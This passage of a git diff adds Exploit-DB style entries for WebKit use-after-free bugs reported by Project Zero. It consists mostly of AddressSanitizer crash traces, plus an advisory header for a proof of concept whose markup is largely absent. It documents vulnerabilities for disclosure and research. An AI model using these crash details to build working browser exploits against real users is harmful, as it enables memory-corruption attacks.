(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8ea193) + #5 0x112c860e4 in WebCore::VisiblePosition::canonicalPosition(WebCore::Position const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30de0e4) + #6 0x112c85dc7 in WebCore::VisiblePosition::init(WebCore::Position const&, WebCore::EAffinity) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30dddc7) + #7 0x112c8cfde in WebCore::VisibleSelection::setBaseAndExtentToDeepEquivalents() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30e4fde) + #8 0x112c8b43f in WebCore::VisibleSelection::validate(WebCore::TextGranularity) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30e343f) + #9 0x112c8b986 in WebCore::VisibleSelection::selectionFromContentsOfNode(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30e3986) + #10 0x11071c1f2 in WebCore::FrameSelection::selectAll() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb741f2) + #11 0x1104de2b0 in WebCore::executeSelectAll(WebCore::Frame&, WebCore::Event*, WebCore::EditorCommandSource, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9362b0) + #12 0x1104d8ab3 in WebCore::Editor::Command::execute(WTF::String const&, WebCore::Event*) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x930ab3) + #13 0x11035900a in WebCore::Document::execCommand(WTF::String const&, bool, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7b100a) + #14 0x110f4e593 in WebCore::jsDocumentPrototypeFunctionExecCommandBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13a6593) + #15 0x110f36068 in long long WebCore::IDLOperation::call<&(WebCore::jsDocumentPrototypeFunctionExecCommandBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x138e068) + #16 0x43f9a9401027 () + #17 0x1084ace49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #18 0x1084ace49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #19 0x1084a5f6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #20 0x108109847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #21 0x10808a88a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #22 0x1076a3731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #23 0x1076a39a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #24 0x1076a3d13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #25 0x110de6615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #26 0x1111f96cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #27 0x110565010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #28 0x110564ae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + #29 0x110442051 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89a051) + #30 0x110451c0f in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8a9c0f) + #31 0x110344b0f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79cb0f) + #32 0x11033ebad in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x796bad) + #33 0x1106f13ed in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb493ed) + #34 0x1106ee75c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4675c) + #35 0x11035e523 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7b6523) + #36 0x1108e25d0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a5d0) + #37 0x1103ff693 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x857693) + #38 0x1103c0736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736) + #39 0x10fe3c047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047) + #40 0x10fe34df1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1) + #41 0x11290c661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661) + #42 0x10140243b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b) + #43 0x1014056d9 in void IPC::handleMessage(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9) + #44 0x101404bc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9) + #45 0x100bf6117 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x307117) + #46 0x1009d5695 in IPC::Connection::dispatchMessage(std::__1::unique_ptr >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe6695) + #47 0x1009dea48 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xefa48) + #48 0x108b248e3 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d228e3) + #49 0x108b251b1 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d231b1) + #50 0x7fffd52af320 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa7320) + #51 0x7fffd529021c in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8821c) + #52 0x7fffd528f715 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87715) + #53 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) + #54 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #55 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #56 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + #57 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) + #58 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) + #59 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) + #60 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) + #61 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) + #62 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) + #63 0x1008d656c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) + #64 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) + +0x607000149b24 is located 20 bytes inside of 72-byte region [0x607000149b10,0x607000149b58) +freed by thread T0 here: + #0 0x103b3c294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) + #1 0x108b74650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650) + #2 0x10ff7685f in WebCore::ContainerNode::removeChildren() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3ce85f) + #3 0x111d1b663 in WebCore::replaceChildrenWithFragment(WebCore::ContainerNode&, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2173663) + #4 0x1104ff36b in WebCore::Element::setInnerHTML(WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x95736b) + #5 0x1111ca534 in WebCore::setJSElementInnerHTMLSetter(JSC::ExecState&, WebCore::JSElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1622534) + #6 0x1111bbca7 in bool WebCore::IDLAttribute::set<&(WebCore::setJSElementInnerHTMLSetter(JSC::ExecState&, WebCore::JSElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1613ca7) + #7 0x1077b0e48 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9aee48) + #8 0x1077b0f77 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9aef77) + #9 0x1082b5008 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x14b3008) + #10 0x10848b655 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1689655) + #11 0x1084a94f4 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a74f4) + #12 0x1084ace49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #13 0x1084a5f6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #14 0x108109847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #15 0x10808a88a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #16 0x1076a3731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #17 0x1076a39a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #18 0x1076a3d13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #19 0x110de6615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #20 0x1111f96cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #21 0x110565010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #22 0x110564ae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + #23 0x110442051 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89a051) + #24 0x110451c0f in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8a9c0f) + #25 0x110344b0f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79cb0f) + #26 0x11033ebad in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x796bad) + #27 0x1106f13ed in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb493ed) + #28 0x1106ee75c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4675c) + #29 0x11035e523 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7b6523) + +previously allocated by thread T0 here: + #0 0x103b3bd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) + #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) + #2 0x108b74ad4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) + #3 0x108b72d6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) + #4 0x108af9247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) + #5 0x108af863a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) + #6 0x10fcee648 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x146648) + #7 0x112acdaad in WebCore::Text::create(WebCore::Document&, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f25aad) + #8 0x112acf4f8 in WebCore::Text::createWithLengthLimit(WebCore::Document&, WTF::String const&, unsigned int, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f274f8) + #9 0x1108b911b in WebCore::HTMLConstructionSite::insertTextNode(WTF::String const&, WebCore::WhitespaceMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd1111b) + #10 0x110a2521f in WebCore::HTMLTreeBuilder::processCharacterBufferForInBody(WebCore::HTMLTreeBuilder::ExternalCharacterTokenBuffer&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe7d21f) + #11 0x110a1f223 in WebCore::HTMLTreeBuilder::processCharacterBuffer(WebCore::HTMLTreeBuilder::ExternalCharacterTokenBuffer&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe77223) + #12 0x110a1e083 in WebCore::HTMLTreeBuilder::processCharacter(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe76083) + #13 0x110a1ad0e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe72d0e) + #14 0x1108e3c8a in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3bc8a) + #15 0x1108e3849 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3b849) + #16 0x1108e29c2 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a9c2) + #17 0x1108e44e8 in WebCore::HTMLDocumentParser::append(WTF::RefPtr&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3c4e8) + #18 0x1102c2531 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x71a531) + #19 0x1103ff63d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x85763d) + #20 0x1103c0736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736) + #21 0x10fe3c047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047) + #22 0x10fe34df1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1) + #23 0x11290c661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661) + #24 0x10140243b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b) + #25 0x1014056d9 in void IPC::handleMessage(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9) + #26 0x101404bc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9) + #27 0x100bf6117 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x307117) + #28 0x1009d5695 in IPC::Connection::dispatchMessage(std::__1::unique_ptr >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe6695) + #29 0x1009dea48 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xefa48) + +SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xa029) in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const +Shadow bytes around the buggy address: + 0x1c0e00029310: fd fd fd fd fd fd fd fa fa fa fa fa 00 00 00 00 + 0x1c0e00029320: 00 00 00 00 00 fa fa fa fa fa fd fd fd fd fd fd + 0x1c0e00029330: fd fd fd fd fa fa fa fa 00 00 00 00 00 00 00 00 + 0x1c0e00029340: 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00 + 0x1c0e00029350: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa +=>0x1c0e00029360: fa fa fd fd[fd]fd fd fd fd fd fd fa fa fa fa fa + 0x1c0e00029370: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 + 0x1c0e00029380: 00 00 00 00 00 00 00 fa fa fa fa fa fd fd fd fd + 0x1c0e00029390: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd + 0x1c0e000293a0: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd + 0x1c0e000293b0: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==29700==ABORTING +*/ \ No newline at end of file diff --git a/platforms/multiple/dos/43169.js b/platforms/multiple/dos/43169.js new file mode 100644 index 000000000..803c85084 --- /dev/null +++ b/platforms/multiple/dos/43169.js @@ -0,0 +1,164 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1347 + +There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. + +Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default. + +PoC: + +================================================================= +*/ + + + + + + +++ +
+ + + +/* +================================================================= + +ASan log: + +================================================================= +==30369==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000346940 at pc 0x000113012178 bp 0x7fff563cac80 sp 0x7fff563cac78 +READ of size 8 at 0x603000346940 thread T0 +==30369==WARNING: invalid path to external symbolizer! +==30369==WARNING: Failed to use and restart external symbolizer! + #0 0x113012177 in WTF::ListHashSetConstIterator >::operator++() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f3177) + #1 0x112ff326d in WTF::ListHashSetIterator >::operator++() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d426d) + #2 0x113007cf2 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8cf2) + #3 0x115dcb242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242) + #4 0x114f89e74 in 